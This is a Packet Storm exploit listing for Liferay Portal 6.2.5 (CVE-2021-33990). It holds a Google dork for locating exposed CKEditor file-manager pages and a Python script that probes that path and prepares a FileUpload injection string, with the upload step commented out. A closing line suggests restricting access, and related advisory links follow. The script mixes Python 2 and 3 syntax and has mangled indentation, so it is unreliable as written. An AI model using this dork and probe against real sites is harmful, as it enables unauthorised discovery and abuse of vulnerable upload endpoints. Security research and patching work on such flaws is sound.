Lucene search
Fu2x2000PACKETSTORM:171701HistoryApr 05, 2023 - 12:00 a.m.
Liferay Portal 6.2.5 Insecure Permissions
2023-04-0500:00:00
fu2x2000
packetstormsecurity.com
120
`# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990
import requests
import json
print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")
url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
else:
print ('not found try a another method')
print ("solution restrict access and user groups")
`
Related
zdt
zdt
Liferay Portal 6.2.5 - Insecure Permissions Exploit
2023-04-05 00:00:00
cve
cve
CVE-2021-33990
2023-04-16 04:15:00
prion
prion
Design/Logic Flaw
2023-04-16 04:15:00
exploitdb
exploitdb
Liferay Portal 6.2.5 - Insecure Permissions
2023-04-05 00:00:00
openvas
openvas
Directory Scanner
2005-11-03 00:00:00
Related for PACKETSTORM:171701